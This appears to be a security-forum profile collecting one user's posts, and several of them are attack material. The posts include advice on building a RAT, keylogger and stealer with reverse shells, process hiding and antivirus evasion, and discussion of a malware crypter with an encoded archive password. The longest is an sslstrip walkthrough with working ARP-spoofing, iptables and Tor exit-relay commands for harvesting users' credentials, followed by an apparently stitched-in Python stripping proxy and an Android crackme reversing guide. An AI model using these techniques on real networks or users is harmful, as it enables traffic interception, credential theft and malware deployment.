me.mello
Active Members
Posts: 571
Days Won: 4

Everything posted by me.mello

  1. Don't make 10 threads for a few templates... make one and put them all in it.
  2. It's also called polymorph... so much ass-kissing... you really have no clue, honestly.
  3. Put me on the .NET list too... I know more than that, but I want to get involved as well. Thanks a lot.
  4. OK, from what I understand you formatted D but it didn't have time to finish formatting... I recognize the problem... There's nothing more you can do about it... you've pretty much lost the data on D... and you no longer see partition E :| Try going into Disk Management:

Accessing Disk Management. There are a few different ways to access Disk Management. Method 1 - Start > Control Panel > Performance and Maintenance > Administrative Tools. Double-click Computer Management and then click Disk Management in the left-hand column. Method 2 - By default, Administrative Tools is not shown on the Start Menu, but if you have modified the Start Menu (by right-clicking the Start button and selecting Properties > Customize) so that it is shown, then just select Start > Administrative Tools > Computer Management and then click Disk Management in the left-hand column. This is the easiest! Method 3 - Click Start > Run, type diskmgmt.msc in the Open: line and click OK. The Disk Management snap-in will open.

There you will see all the partitions, whether they are hidden via the registry, unformatted, or inaccessible because of an error. If you see D, right-click it and format it... if you also see E there, right-click it and choose Explore... Explorer should take you into the partition (only from there, given that it doesn't show up in My Computer)... if it does... I suggest you make a backup... to D, since it will be empty anyway ;)) and then format E too... after that there's a good chance both will show up after a reboot. Edit: You can also try something more serious, namely Paragon Partition Manager... the name says it all. You can do just about anything with the HDD except recover data... there are other tools for that, but I don't think you need them, since they tell you it can take weeks. Off-topic: I don't understand why you all use all that junk when Windows gives you absolutely everything... generally speaking.
  5. I don't get the "metamorphic" part... whatever. If you meant polymorphic, it's definitely not... first of all you have a stub... second, you have junk code... it's a dirty way to do a bypass... I was talking with oust and we were laughing :)) the libraries are pretty big, 400 KB for a keylogger that, if you put it directly in the server, is at most 10 KB? When you invoke no more than 5 API functions at most? That's how much junk code you put in?... just for AV? Options you should, and I recommend you try to, implement: 1: Reverse connect... can be done in countless ways... PHP. 2: Clients: also with PHP, implemented in the server... when the server is connected it writes something in PHP that is read by the client. 3: Reverse shell. 4: Remove those "fun" things, they look like kid stuff for excited virgins (only they would use them). We all know FindWindow is an API function and WS_Hide is also part of the Win32 API. We're a security forum, as serious as can be... even if we joke around and swear. 5: Try what I wrote you earlier... stealer. 6: Keep certain essential functions in the server, stop making plugins... they're pretty big anyway... the junk code is pointless. The server is the one that has to survive. 7: Try implementing server.exe as a server, and try to hide it from Task Manager. 8: Try implementing ACL/DACL... a bit of protection against AV, and also process protection... so it doesn't get picked up by Olly. 9: Most importantly... try to make it polymorphic without a stub... I don't think it's that complicated. 10: ///removed. Despite all that, don't let the haters talk... here you'll find bad mouths no matter what you do, because they can't do it themselves. Once again, congratulations.
  6. Very elegant, quite a lot of functions... those libraries are very good for the "masses". oust knows what AntiExecutable is about. Although some of us don't care how elegant the client is, if the server is built without a stub... //removed. As for your methods of getting past security systems via junk or dirty code (from what I understand), it's good... but in the vast majority of cases it sometimes greatly increases the size of the server. As for plugins... they're a bit large for so few functions, but that reminds me of Yuri Rat... where you can upload plugins and then access them. Since you named this application a Remote Admin Tool I won't go any further... but you could easily turn it into a stealer too, or if not, from what I've noticed you handle those well... I suggest you look through my latest threads... you'll get a starting idea. If you want more information... although I don't think you need it, you can contact me anytime. All in all, good job... I'm glad someone on RST is taking this seriously. I hope, if time allows, to show off a RAT of my own soon ;)
  7. I'd say RAID, RAID until we all get in; he's right, we are the future, and we're in the same shit as the Moldovans, what the hell, are they more miserable than us, so they should be the ones to start something, or what? Who's willing to make a topic? I'm sick of tearful discussions about what that guy did... if he had set himself on fire you'd still be discussing all that shit. So I'd say DEEDS, NOT WORDS.
  8. Nytro, I like how you approached the subject, very elegant, some people will actually understand something... even me, but in Romania that's how it is; abroad, of course, it's completely different, I'll explain why later. They ask you point blank roughly what salary you think you deserve... well, that question is a bit tricky because whether you say a high salary or a lower one it's bad... if you want to target company "x", say, and here I mean approaching a company... say web developer at company "x", it's good to find out roughly what salary they'd offer... it's usually a trick question even here in our country. OK, now as for experience... usually when you come out of university, especially economics... this is usually where it's "harder", they'll ask you for experience... or rather work history... well, you can't tell them you've worked somewhere else, but you can show them what projects you did in university... if you spent your 3 years of university drinking beer by the meter... don't hope for too much if mom and dad can't "chip in" for a better job... so it's good that wherever you apply you have a project to put on your CV.

Now let's get back to our web developer example... most places, especially here in our country, ask for PHP/MySQL... roughly what most of you do, since I'm talking about a security forum here... it's not a big deal... but it's one thing to do what you're asked and another to find XSS and SQLi yourself, and then panic or stage fright sets in... call it whatever you like... don't hope they'll give you big tasks; it's possible that at a job you'll be asked for less than you know... but don't count on that either... you have to be optimistic... not live in the hope of "I'll get an easy job"... NO, you won't be alone. Now let's move on to the experience chapter... unless you're a PHP guru, don't be afraid of anything, and tell them straight: look, this is what I can do and know how to do. It's good to have a portfolio of everything you've done that is "live" today, so you can show them that you really do know and can do more... and why do I say this? A few weeks ago, around the end of June, I needed someone to build me a full PHP site with everything I needed. Well, as usual and in most cases, I went to someone I knew first, before asking a company or someone less familiar for help; I went to a friend's brother... when I explained the situation and exactly what I wanted (and I should add here that he makes his living building sites... he has a company, but he started as a game tester at Ubisoft... but let's leave that), when I told him in detail what I wanted to do... I could simply feel over the phone how that person realized this wasn't something that comes from just anywhere and... I think he panicked and started going on about what he has in his portfolio and what he'd done in the past for various companies... etc. He probably wanted to impress me with something, and I'm a person who, in the field he's in, knows exactly what to ask of you, and as directly as possible, even if some are afraid of the scale, which is sometimes too big... I've been through this too... you'll probably go through it too, unless some of you have already been through this situation... it's a good thing to learn... sometimes there's a lot of money at stake... but it all comes down to responsibility... you shouldn't be afraid of it... it's a digital world and you can spin it however you want; even if you're not the only one in it, it's yours... and yours alone!!

I have to admit I had some security problems, but they were solved with a bit of outside help; the guy did my job, I paid him, I'm satisfied given the situation I'm in... namely, I don't know a word of PHP and at my age I don't have the time to learn either; I consider that I know ASP.NET well enough to build a better website than what the individual in question built for me... after all, what's made by you, you consider better made, and besides that, if I go the web developer route, .NET is what made me money, not PHP. There are simply too many reasons to drop many things and start programming in PHP when I know and am completely absorbed in something else. That's another thing worth remembering: for example, for me, learning PHP just for myself, I don't think I'd make enough money from it to satisfy me, so if you know something and started with it... stick with it to the end; surely, and many will tell you, there will be a job for you too, as long as you perform now while you're in your "prime". You often encounter this dilemma, if you can call it that, with Linux/Windows people; don't think that when it comes to money Linux is better than Windows... but in general Linux people are the most likely to find n reasons why they won't switch to Win... and they'll probably work, or if not, try to find a job on that platform.

So perform, in the field you're used to; don't get into something else if you don't have a good impression at the start. I haven't learned... or at least absolutely nothing has stuck in my mind that didn't seem interesting and as close as possible to what I know... of course, over time you'll learn as you go and you'll change this opinion, if you happen to share it... but right now, at this age, some of you, I really think, still have a lot to absorb... or not. BY THE WAY, for RST members: around the beginning of the summer, I intended, through someone, to start something very big in the country... this is absolutely no lie... I really talked to someone and explained it to him... then I noticed he's a high school student with a lot of plans in his head... I won't say who it is... I hope they come true, he's a really very talented person and has proven it to all of us... It's possible, very soon... or never... depending on how things evolve (I've noticed Nytro is trying to steer you toward a world where not everything that glitters is gold... referring here to this topic... about IT students who want a job in the field), that I'll need certain people from here; everything happens in the country... I don't want help from abroad. If so, I'll contact you by PM or in this topic, depending on when it happens; I've already asked some people around the forum whom I've befriended and who are very decent about certain people, and I think on a certain platform I'll need certain people who have nothing to do or think that what they do brings them too little... as abroad, if things go well, I'll personally make sure you get certified in the field abroad, and I won't say more; as with the person I talked to, you'll have time for school + many other things... this job, if you get it, will be completely different from what's offered in the country at certain companies; in short, the conditions will be like "abroad", if we can call it that.

To get back to the subject, since I've gone way off-topic, I'll help Nytro a bit. As I mentioned above, what you answer at the interview matters a lot... most employers know exactly what goes on at universities... so you can impress them with a portfolio, preferably as rich as possible, speaking politely, of course, so you don't look like you're from the gypsy camp with a hick email :)) +rep. Now, while you're "fresh", try to stick with the thing you like most... if you do PHP, which is the most popular, there's no point thinking about starting .NET, whether ASP, Silverlight, C#, VB... etc., they're pointless, it's a waste of time. Since I'm no good with PHP I can't recommend anything in that area, but if you have doubts like "Do I have enough knowledge to work at a company? or to work in general?", well, there's no reason to ask yourself that question, and to give you as concrete an answer as possible I can only recommend 2 things that changed my life for the better and surely, more than surely, will do the same for you if you stick with it.

1: PrepLogic (CompTIA A+ Certification, CCNA Training, MCITP and MCSE Training & More). Do you have doubts about your knowledge? Download a free exam and take it... see what score you get... I don't recommend taking it 2 or more times (if you want to test your knowledge), because it's the same exam and you'll surely score higher the second time, but I do recommend taking it as often as you can... and at the end of the test go to the summary and see what you got wrong on the questions you really didn't know how to answer... click the answer and find out the answer... that's the correct answer... usually you also get an exact definition, and I say this because there will surely be questions you can't find the answer to. On top of that you have your partner Google to help you.

2: TopCoder (TopCoder, Inc. | Home of the world's largest development community). I remember when I first came to the forum I ended up arguing and disagreeing with Nytro (by the way, I apologize again); he kept telling me what I'd done in the past... I always answered that I had nothing to prove to him and told him about TopCoder :)) Well, that's where I grew up, but let's get back. Do you have, or think you have, knowledge oozing out of you? Prove what you know. But don't prove it on a forum, prove it there... From all over the world, programmers, generally freelancers, turn up on TopCoder for a competition... Let me tell you briefly... for those who haven't heard... TopCoder, as the name says, is where you compete to see who's the best, but that's not quite how things are; TopCoder is a Java platform, it looks like an arena... where you have several categories; to start, pick an easy problem... and select the minimum number of points... if you solve the problem you get the points... you'll see that you can challenge someone else... you can see how the person with the highest score on that problem solved it, and by that I mean programming; each problem can be solved in different programming languages... it's all about selecting the language and writing the code... checking it and then sending it to the compiler... you can program in Visual Basic, C#, C++, Java, Python... depending on how many languages the problem offers... I mean how many they give you... but in most cases you have Python, Java, C++, C# or Visual Basic... there you can't go wrong, there's no way to submit wrong code... if it's wrong you can't submit it... I recommend you don't copy code from others, TopCoder doesn't really accept that; you'll figure it out. Before any problem you can choose a number of points... the higher it is, the harder the problem... you'll see that if you did well... and got, say, 500 points for that problem, you'll appear somewhere at the bottom of the ranking for that problem... and others will have thousands of points, which seems impossible to you... well, that's the challenge, you'll see in time. As a freelance programmer... you can make a lot of money from TopCoder... because a lot happens there... companies turn to this site... even NASA held a competition with a lot of money at stake... you'll get emails with the latest competitions; if you feel up to it, even though you're not used to the scene, I recommend you jump in, you have nothing to lose; but if you select a certain number of points and your code is correct but isn't worth that number of points, you'll get fewer; you also have the chance to correct your code for a higher number of points, but if you got it worse the second time it's pretty much in vain, and I recommend you start another problem. There will be competitions for design, programming and others... companies turn to TopCoder for certain programs... you're given exactly all the details you need together with a problem... you're given the parameters of a function, variables and everything you need... you just program. If you're at all capable and you jump in, within a year on TopCoder you'll realize the difference between learning from tutorials/forums and practicing live, and on top of that you'll make lots of friends/connections, maybe win some competition... even the smallest possible competition won can put $500 in your pocket, plus very, very many other things. As I said, the competitions, not the problems, you'll receive by email; I say be alert, read carefully what's asked and sign up... the faster you are the better, you'll see why; don't find yourself, like me in countless cases, not reading my mail, reading it later and finding out the problem was actually easy and I could have solved it... or not. I wish you success in life, and choose what you think is best, but don't poke your nose where it doesn't belong; sometimes it's better to think twice before taking a step.
  9. Tuts 4 You (http://tuts4you.com), great site... you have a lot to learn from here... it has always been a good start, and the people who learned something came back and now help others in turn, unlike other copy-paste sites; well-known reversers honed their skills on tuts4you :) I recommend it to everyone.
  10. Queensland... any time of the year, you can trust me on that ;) that is, if you're not afraid of drowning among the coral in 2 meters of water over a 20 km radius :))
  11. I wonder if I can implement something from here in XSS tunnel :)
  12. No shit!! Look at this: http://rstcenter.com/forum/35321-dot-anything-take-over-internet-expert.rst
  13. @gixman stay chill, man, I didn't say it out of spite; I knew the crypter would go down the drain, but believe me, I've made plenty in ASM too, and now I make them in VB because they're very, very simple to do. What I wanted to say is that you didn't need to encrypt the password in all that crap like that guy did; more than that, you did about the same thing, you just encrypted it differently :) The thing is, it went down the drain anyway, but the guy updates them constantly, even if he won't release it publicly anymore or sell the source, so I was thinking you should give it without the encrypted password, because if you read above, whoever needs it won't screw it up... Conclusion: crypters appear daily, you have to know where to hit, and it's nice to give things away for free; forget the people who say "good thing you put the encrypted password, that way the crypter won't get screwed"; in my opinion that's wrong... especially here on the forum :) I hope you're not upset, I had no intention of offending you in any way.
  14. eeeee, popcorn with cheeeese ;)) +1 Edit: base64 (x2) ->> hex (x2) ->> base64. Try crypto.com next time. Better to encrypt the username and the code... rather than the link; it's easy to google the topic title.
  15. You're all wasting your breath for nothing; I wanted to post the password or another link myself, but I don't want to damage the image of the original author. L3G!T™ said he won't make it anymore if it's made public or... personally, I don't care; it's made in VB.NET, and even a kid with at least 1 year of Visual Basic experience can start making crypters, but I'm amused that you followed everyone who encrypted the archive like the original author did in n crypters (I'm telling you as someone who has heard of and knows what FUD means, there's a good chance you've also heard of Matt Blaze / crypto.com); you could have avoided doing that. The original article by L3G!T™ on hackforums: Hack Forums. Stub archive : WgYJ7OPTk04H/16/DgDovHhr402NZHBE=+BWZRcGDf67W4h9D0Bs6l48k4I1ITNkgYJDGD94GSG64fTBG5Iwytt4IW3B+BWC?lcG7zZsC8hjv3Ys6dWMDfVIcISSkezk7dz84GTj6Hf8B3WI4fhTWfWI6GtfB+YGCkHb=gz7C8hTWINl1?dZfklfR=ytn Encrypted --> REVERSER > ZONG22 (x2) > REVERSER > T-ASCII > TIGO-3FX (x3). Of course some loser from hackcomunity.com (satz333 >> crap leecher, banned the same day) had to post the crypter too, a day after it was posted on hackforums: L3G!T. Fortunately the loser got banned. But now it's no longer FUD; try not to copy-paste mindlessly anymore. Anyway, the author sticks with it and updates the crypter daily; let's hope he won't sell the source for peanuts.

And for the rest of you: Tigo-3fX Armon-64 HAZZ-15 (x2) ZONG22. Next time don't play the smart guy by doing what someone else does, because some madman like me will wake up and embarrass you. If you're going to copy-paste from a banned user, L3G!T, or even from the original author on Hack Forums, post the original link, even without the password; if you'd read carefully, the guy says he updates the link daily... and your originality goes down the drain :)) PS: Crypters appear daily; don't judge me for telling the guy to do something right; even though it's made in VB it's still fairly complex as it is, and don't tell me I don't understand that they shouldn't be made public for anyone to get their hands on, but here on the forum I'm more than sure there are people who have a use for a crypter and need one, and there are also people who know what a crypter is about and upload it to VirusTotal on their own initiative just to do harm... now tell me, those people don't know how to decode tirgo-3fx?? when the guy states the exact encoding steps? As for the mamaligari (hicks)... they have no idea what a crypter is, don't really know what to look for, and don't really have any business on this forum :)
  16. Author: Juan J. Fernandez

Secure Socket Layer is not as secure as we might think. At least, across http and https. Vulnerabilities are present in the exchange of data across http -> https and https -> http. These are exploited using https stripping attacks: transparently hijacking http traffic on a network, watching for https links and redirects, and mapping those links into look-alike http links. The SSLSTRIP tool does exactly that and can be deployed through a man-in-the-middle attack on a wireless network using iptables and arpspoof. It can also be deployed on the Tor network if you configure your computer as an exit relay node on port 80.

REQUIREMENTS

I assume you are using a GNU/Linux OS or Mac OS X.
SSLSTRIP: main tool for our stripping attack
IPTABLES: to match our target traffic and redirect it to sslstrip
ARPSPOOF: used on the wireless network to make our computer look like the router
Tor as relay: to apply the concept once we enter another network

Wireless https stripping attack

As root, type in the terminal:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    arpspoof -i <interface, e.g. wlan0> <LAN gateway IP, e.g. 192.168.1.1>
This will authorize your Linux box to forward packets and perform ARP injection to let every computer know that your MAC address is the MAC address of the router, thus forwarding all those packets to you. Now open another terminal as root and type:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
This sets the filtering rule (firewall) as "alter packets as soon as they come in destined for port 80, redirecting them to port 8080". Now, in the same terminal as root, type:
    sslstrip -l 8080 -w sslstrip.log
and in another terminal type:
    tail -f sslstrip.log
At this point sslstrip does the job, and neither the server nor the client knows that you are hijacking http and watching for https links to redirect and map those links into similar http links or homograph-similar https links. The tail command watches the log file as it grows.

Tor network https stripping attack

A wireless network is like any other network. Why not apply this to another network, like the Tor network? It just requires a minor modification to the iptables command, dropping the use of arpspoof, and of course setting up Tor as a relay.

Set up a Tor relay

Tor is a network of relays; when a user uses Tor, they pass through about three computers (relays) before reaching the final destination. I will show you how to be the exit node (the last relay). We will create another account so that the redirection applies to that uid (the user id, not us), which prevents the disconnection... Open a terminal as root and type:
    useradd toruser -u 111 -m
    passwd toruser
(use the password you like). Then log out of your account and log in as toruser.

Install Tor (Tor: Linux/BSD/Unix Install Instructions). For the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux from Download Tor, extract it (tar xvfz file.tar.gz), cd into the directory and run vidalia from filedirectory/App. Once it is running, click setup relay and configure the exit node for port 80 only. Make sure your router forwards ports 80, 9051, 9001 and 9030 to your local IP if you are behind the router's firewall. Once you test it and verify that it is reachable from the outside by running it again, log out of the toruser account and log back into your original account. Now the fun part starts... Sniff out that Tor network!!!

Open a terminal, type su toruser and enter the assigned password. This is an important step to run the relay: cd into the tor-browser_en-US directory (in my case) inside the toruser account and run tor:
    ./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrc
Now that everything is running and reachable from outside, open another terminal and as root type:
    iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080
Everything that comes from toruser will be redirected to local port 8080. DNAT means that it matches if the original destination differs from the reply source. This makes sense when the OUTPUT chain matches (these are iptables details worth knowing, to see what is really happening...). Now type:
    sslstrip -l 8080 -w logfile
and in another terminal, to watch the file as it grows:
    tail -f logfile
Let it run for a couple of hours or days and you will see accounts, MD5 hashes, email messages, hosting accounts and more. The next page is just a small part of what I collected from the Tor network.

References
DEFCON 17 - SSLSTRIP: Moxie Marlinspike >> software >> sslstrip
Tor: Tor: Documentation
IPTABLES: iptables(8) - Linux man page

Have fun reading ><
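The rewriting step the post describes (watch for https links and redirects, hand the victim look-alike http links, then talk HTTPS to the real server yourself) as an added example in Python. This is my code, not the sslstrip tool or anything from the original post; the response headers and body are constructed for the demo, and the handling of the Secure cookie flag and of the Strict-Transport-Security header are my assumptions about what a stripping proxy needs, not a description of the sslstrip release the post uses.

```python
"""Minimal model of an HTTPS-stripping proxy's rewrite step (added example)."""
import re

# Matches an absolute https:// URL up to whitespace or an HTML quote/bracket.
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\"'<>]*)?)")


def strip_body(html: str, stripped: set) -> str:
    """Rewrite every https:// link in a response body to http://.
    Each downgraded host/path is remembered so the proxy knows to fetch it
    over HTTPS from the real server when the victim follows the link."""
    def downgrade(match):
        stripped.add(match.group(1))
        return "http://" + match.group(1)
    return HTTPS_URL.sub(downgrade, html)


def strip_headers(headers: dict, stripped: set) -> dict:
    """Downgrade an https:// Location redirect, drop the Secure flag from
    cookies so the browser sends them over the stripped http connection, and
    drop Strict-Transport-Security (assumption: letting it through would make
    the browser refuse plain http on its next visit)."""
    out = {}
    for name, value in headers.items():
        key = name.lower()
        if key == "location" and value.lower().startswith("https://"):
            target = value[len("https://"):]
            stripped.add(target)
            value = "http://" + target
        elif key == "strict-transport-security":
            continue
        elif key == "set-cookie":
            value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
        out[name] = value
    return out


def strip_response(headers: dict, body: str):
    """Process one server response as the MITM proxy would. Returns the
    rewritten headers, the rewritten body and the set of downgraded URLs."""
    stripped: set = set()
    return strip_headers(headers, stripped), strip_body(body, stripped), stripped


def should_upgrade(request_url: str, stripped: set) -> bool:
    """Server side of the proxy: a plain http:// request from the victim is
    sent to the origin over HTTPS if it is one we downgraded earlier."""
    return request_url.startswith("http://") and request_url[len("http://"):] in stripped


# Constructed sample: a login redirect plus a page linking to HTTPS resources.
SAMPLE_HEADERS = {
    "Location": "https://bank.example/login",
    "Set-Cookie": "session=abc; Secure; HttpOnly",
    "Strict-Transport-Security": "max-age=31536000",
    "Content-Type": "text/html",
}
SAMPLE_BODY = (
    '<a href="https://bank.example/login">Log in</a>\n'
    '<form action="https://bank.example/auth" method="post"></form>\n'
    '<a href="http://news.example/">news</a>\n'
)

if __name__ == "__main__":
    hdrs, body, seen = strip_response(SAMPLE_HEADERS, SAMPLE_BODY)
    print(hdrs)
    print(body)
    print("upgrade /login:", should_upgrade("http://bank.example/login", seen))
```

The mapping set is what makes the trick invisible to the server: it only ever sees HTTPS from the proxy, while the victim only ever sees http. The caveat a practitioner wants is that the attack depends on the victim's first request being plain http; a site whose HSTS policy the browser already knows, or that is on the browser's preloaded HSTS list, cannot be stripped this way at all.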
  17. German DDoSer jailed for World Cup gambling extortion
Frankfurter menaced bookies with rented bots
By John Leyden, posted in Crime, 17th June 2011 15:38 GMT

A hacker based in Germany has been jailed for 34 months over a DDoS-based extortion scam against gambling websites in the run-up to last year's World Cup. The unnamed Frankfurt resident was also ordered to pay damages of 350,000 euros ($504,000) by a Düsseldorf court following his conviction for attempting to run a protection racket against six online betting sites. None of the affected sites have been named.

The miscreant reportedly hired a botnet at a cost of just $65 before threatening to blast target sites with junk traffic during the World Cup unless they paid him 2,500 euros ($3,700). Three targeted sites paid a combined total of 5,000 euros, while the other three refused to play ball, Deutsche Welle reports (German court convicts man of online extortion | Science & Technology | Deutsche Welle | 15.06.2011).

Details of the case, decided in March, were first published this week. The case is one of the first of its type to be considered by the German courts. An earlier prosecution, involving a politically motivated denial of service attack against German airline Lufthansa back in 2001, failed to result in a conviction. That case was brought against two non-profit organisations, who objected to Lufthansa's participation in the deportation of people seeking asylum in Germany. Considered by the courts back in 2005, the case failed essentially because the DDoS attacks had a purely political motive and were considered a non-criminal form of "civil disobedience".

Am I the only one who thinks 34 months is a bit short??
  18. Yes, unfortunately that's how it is... but it's among the first versions (from around 2008), I haven't added protection since. I did say it... I have a version that gets past anything... this one basically uses a kernel driver... and the software that detects it basically detects the hidden service (driver service) that holds the process address; if I deleted this storage function from the service you couldn't recover the process anymore, it would stay hidden until restart. And this driver service is useful for the class announcement (init(), which basically announces the service), so that's another problem... in the newer versions I don't use it. That's roughly what Comodo does; it basically takes care of the service; there's no way a little program can read what I do with the processor... it's a kernel bypass, only I know how to make something anti-hidden for myself. I don't know if you understand me. But it's lousy, I really didn't know... anyway, let's be serious, @staticwater, how many know about Comodo? Most use procexp or taskmgr. And if I were to make something truly hidden I don't think I'd use an ancient source from 2008 ;))
  19. Author: Dhanesh

Setting up the Ground

Well, it seems people are getting crazy about the Android platform (everyone is trying to buy an Android phone!). I don't have an Android cell phone, but let's see if I can get my hands dirty with this Linux+Java clean-room engineered platform. To begin our journey we need the Android SDK, a target to test with and the necessary tools. You can download the necessary files from these locations:
Android SDK: Android SDK | Android Developers
Deurus Android crackme 03: http://crackmes.de/users/deurus/android_crackme03/
Smali and baksmali: smali - An assembler/disassembler for Android's dex format - Google Project Hosting
Dex2jar: dex2jar - A tool for converting Android's .dex format to Java's .class format - Google Project Hosting
Java decompiler: JD | Java Decompiler

Download and install the Android SDK, an SDK platform (the latest is 2.2 at the time of writing), the necessary Java packages and the rest of the tools. Create a virtual device from the SDK menu and start emulation. Within a few minutes you can see the emulator booting up and showing the phone screen. Well, that's it! We have our emulator up and running.

Getting Started with the Game

Now we need to install the software (the crackme; it's legal!) on the emulator. For that you may have to get acquainted with the Android Debug Bridge (adb): Android Debug Bridge | Android Developers. Installing an apk file is pretty simple; all you have to do is run two commands from the Android SDK directory/tools. After the installation you can see the crackme icon in the application menu. Now run the crackme by clicking on it. If everything went as expected you will see the crackme application on the screen. Now we will play with it: pressing the check button with no input pops up the message 'Min 4 chars', and with a proper name it pops up 'Bad boy'. We have to remember these strings because we will use them as our search keys when we disassemble the apk (actually dex) files. Also note that we have two hardware ids and we need to find out exactly what those mean.

Real Android Reversing

As our crackme is up and running in the emulator, we now move on to reversing it. If you have read about the apk file format, you can think of it as an extended JAR file, which is essentially a zip file. Now rename Crackme03.apk to Crackme03.zip and decompress it into any folder. The interesting file for us is classes.dex, which contains the compiled VM code. We are going to disassemble the dex file with baksmali (smali - An assembler/disassembler for Android's dex format - Google Project Hosting). The commands are pretty simple, as you can see from the screenshots. If everything worked fine, we will have a folder structure similar to Java packages. The interesting .smali files are located at '\com\example\helloandroid'. Open all the .smali files in your favorite text editor (I use Notepad++). If you have never done anything related to reverse engineering/esoteric programming/assembly (IL) programming, you will probably think: WTF! Relax. We have just opened a disassembled dex file. Now, if you are wondering how on earth someone can find the correct location of the checking function, I hope you remember those pop-up strings I mentioned earlier. Yeah, 'Min 4 chars' and 'Bad boy'. Now we will use those strings as our search keys. Searching for "Min 4 chars" in all the opened .smali files, we find a hit in HelloAndroid$2.smali at line 130. Our aim is to understand the serial checking function and write a keygen for it. For that we have to know all the Dalvik opcodes used here. You can visit the Dalvik opcodes page to understand the opcodes, and after that you can convert the disassembled code into much higher-level language constructs. I will provide a brief code snippet which actually implements the algorithm. The two hardware ids used are the IMEI and the SIM serial number.

    # Read the name from its text box
    const v23, 0x7f050004
    invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View;
    move-result-object v9

    # Read the serial from its text box
    const v23, 0x7f050006
    invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View;
    move-result-object v21

    # Check that the name is at least 4 chars long (branch if length >= 4)
    const/16 v22, 0x4
    move v0, v11
    move/from16 v1, v22
    if-ge v0, v1, :cond_51

    # Otherwise pop up the "Min 4 chars" toast
    const-string v23, "Min 4 chars"
    const/16 v24, 0x1
    .line 86
    invoke-static/range {v22 .. v24}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    move-result-object v13
    .line 88
    .local v13, notificacionToast:Landroid/widget/Toast;
    invoke-virtual {v13}, Landroid/widget/Toast;->show()V

    # A little exception trick builds an integer string from the username:
    # it converts "aaaa" to "97979797", the ASCII codes concatenated
    invoke-virtual {v10, v5}, Ljava/lang/String;->charAt(I)C
    move-result v3

    # Take the first 5 chars of the ASCII-converted name
    const/16 v22, 0x0
    const/16 v23, 0x5
    move-object v0, v12
    move/from16 v1, v22
    move/from16 v2, v23
    invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    # Convert it to an integer and XOR with 0x6B016 - serial part 1
    invoke-static {v12}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
    move-result v22
    const v23, 0x6b016
    xor-int v22, v22, v23

    # Get the IMEI from TelephonyManager
    # http://developer.android.com/reference/android/telephony/TelephonyManager.html
    invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
    move-result-object v6
    .line 102
    .local v6, imei2:Ljava/lang/String;

    # Get the SIM serial
    invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String;
    move-result-object v16
    .line 103
57 .local v16, simsn:Ljava/lang/String; 58 59 //Getting first 6 chars from IMEI, and similarly from sim serial (IMEI.Substring(0,6) will be used as Serial part 3) 60 const/16 v22, 0x0 61 const/16 v23, 0x6 62 move-object v0, v6 63 move/from16 v1, v22 64 move/from16 v2, v23 65 invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String; 66 67 //Converting them to integer and xoring - Serial part2 68 invoke-static/range {v19 .. v19}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 69 move-result v22 70 invoke-static/range {v20 .. v20}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I 71 move-result v23 72 xor-int v22, v22, v23 73 74 //Making a new StringBuilder object and formatting the string to part1-part2-part3 75 new-instance v22, Ljava/lang/StringBuilder; 76 invoke-static {v12}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String; 77 move-result-object v23 78 invoke-direct/range {v22 .. v23}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V 79 const-string v23, "-" 80 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 81 move-result-object v22 82 invoke-static/range {v17 .. v18}, Ljava/lang/String;->valueOf(J)Ljava/lang/String; 83 move-result-object v23 84 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 85 move-result-object v22 86 const-string v23, "-" 87 invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 88 move-result-object v22 89 move-object/from16 v0, v22 90 move-object/from16 v1, v19 91 invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 92 move-result-object v22 93 94 //Checking whether user entered serial and program made serials are equal. 
95 invoke-virtual {v14, v15}, Ljava/lang/String;->equals(Ljava/lang/Object;) As you can see, the algorithm is pretty straight forward. It is using name and two hardware ids as input and doing some operations on them to make a serial. We can easily recode it in any programming language we prefer to make it as a keygen. Anyway, I am not posting any keygen sources as it will spoil the whole phun! Decoding the Algorithm A demonstrative serial calculation routine is given below: Name: aaaaa HW ID1: 0000000000000000 HW ID2: 89014103211118510720 Here are stepwise instructions on generating final serial number At first 'aaaaa' will be converted to '9797979797', from which we will take first 5 letters and convert it into integer 97979 This will be xored with 0x6B016 resulting 511661 and this will be first part of serial. For second part, we will take first 6 letters from HW ID1 and HW ID2, convert them to integer and xor, resulting 000000^890141 = 890141. For third part we will use first 6 characters from HW ID1. Formatting with the specified delimiter the serial will become '511661-890141-000000'. Final Verification of Reversing Now we will put the same magic number into our Crackme application. Bingo! everything worked as expected. Now, for all those who thinks it is pretty hard to read all those disassembled instructions and manually converting them to higher language constructs, there are other options. As dalvik is based on design of Java, it is also susceptible to decompilation. There is no decompiler available at this moment, but there is hope. For now we can use another utility which converts dex files to jar files so that we can use Java decompilers to see much more abstracted code. From starting of this blog post you may have noticed the tool dex2jar. Use dex2jar dex2jar - A tool for converting Android's .dex format to 